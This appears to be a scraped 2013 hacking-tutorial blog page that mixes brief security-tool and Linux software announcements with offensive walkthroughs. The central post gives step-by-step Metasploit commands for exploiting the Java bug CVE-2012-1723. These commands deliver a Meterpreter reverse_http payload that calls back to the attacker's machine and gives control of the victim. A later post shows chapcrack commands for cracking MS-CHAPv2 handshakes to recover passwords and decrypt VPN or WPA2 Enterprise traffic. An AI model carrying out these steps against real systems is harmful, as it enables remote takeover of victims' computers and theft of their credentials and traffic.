Nmap 5.50

A primary focus of this release is the Nmap Scripting Engine, which has allowed Nmap to expand up the protocol stack and take network discovery to the next level. Nmap can now query all sorts of application protocols, including web servers, databases, DNS servers,FTP, and now even Gopher servers! Remember those? These capabilities are in self-contained libraries and scripts to avoid bloating Nmap's core engine.

inSSIDer

inSSIDer 2 will display all Wi-Fi access points within range and display their MAC address, SSID, RSSI, Channel, Vendor, Encryption, Max Rate and Network Type. Use the filters feature to quickly sort through long lists of access points. Great news for Linux users! inSSIDer 2, a very popular free/open source Wi-Fi network scanner for Windows Vista and Windows XP is now available for Linux Download inSSIDer 2 for Linux (currently alpha) - includes .deb and .rpm.

SuperTuxKart

It’s here, racing fans – a brand new version of iconic Linux game ‘SuperTuxKart’ is now available for download.

Install VirtualBox 4.0 (Stable) In Ubuntu, Via Repository

VirtualBox 4.0 has been released today. We've already covered what's new in VirtualBox 4.0 when the first beta came out so check out that post or the changelog for more info. As you probably know, starting with VirtualBox 4.0 some features are now available separately, in an extension pack. Here are the step-by-step instructions on installing both VirtualBox and the Extensions Pack in Ubuntu.

IOCTL Fuzzer v1.2 Released

IOCTL Fuzzer is a tool designed to automate the task of searching vulnerabilities in Windows kernel drivers by performing fuzz tests on them.

TwitterPasswordDecryptor – Instantly Recover Twitter Account Passwords

TwitterPasswordDecryptor is the FREE tool to instantly recover Twitter account passwords stored by popular web browsers.

Tuesday, May 14, 2013

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

6:23 PM Unknown

CVE-2012-1723
: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

Attacker Machine: Backtrack
Victim Machine: Windows (install JRE un-patched version  )

Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:

msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.
Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:

POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
Metasploit Module: http://www.exploit-db.com/exploits/19717/

How to connect ssl to backtrack using putty

6:05 PM Unknown

The video is created by Vishnu Sharma. In this video he has showed u how to run ssh service in u r backtrack or any Linux machine using putty.The download link of putty: http://putty.org

Web Vulnerability]cross site scripting part 1

6:02 PM Unknown

Tutorial Target Web Vulnerability]cross site scripting part 1

Chapcrack: A tool for cracking MS-CHAPv2 network handshakes

5:58 PM Unknown

Chapcrack is a tool for parsing and decrypting MS-CHAPv2 network handshakes. In order to use it, a packet with an MS-CHAPv2 network handshake must be obtained. The tool is used to parse relevant credentials from the handshake. In other words, Chapcrack parses the credential information out of MS-CHAPv2 handshakes, sends to Cloudcracker which in turn will return a packet that can be decrypted by Chapcrack to recover the password.

The resulting file (“token”) is then submitted to CloudCracker, an online password cracking service for penetration testers and network auditors, which returns the cracked MD4 hash in under a day. For each handshake, it outputs the username, known plaintext, two known ciphertexts, and will crack the third DES key. Whats interesting to know is that Cloudcracker forwards your handshake information to a Pico Computing’s DES cracking box, which is powered by a FPGA box that implemented DES as a real pipeline, with one DES operation for each clock cycle. With 40 cores at 450mhz, that’s 18 billion keys/second!

The hash is inserted into chapcrack, and the entire network capture is decrypted. Alternatively, it can be used to login to the user’s VPN service or WPA2 Enterprise radius server. All of this is possible only because of the weak protocol architecture that allows MD4 hash of the user’s password to be authenticated as them, as well as to decrypt any of their traffic.

How to use chapcrack?

Obtain a packet capture with an MS-CHAPv2 network handshake in it (PPTP VPN or WPA2 Enterprise handshake, for instance).
Use chapcrack to parse relevant credentials from the handshake (chapcrack parse -i path/to/capture.cap).
Submit the CloudCracker token to www.cloudcracker.com
Get your results, and decrypt the packet capture (chapcrack decrypt -i path/to/capture.cap -o output.cap -n ).Download MS-CHAPv2 Here

 

Subscribe in Bloglines Msn bot last visit powered by MyPagerank.Net Yahoo bot last visit powered by MyPagerank.Net
I heart FeedBurner downtime checker The Ubuntu Counter Project - user number # 31290
 
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Powered by TadPole
FOG FLAMES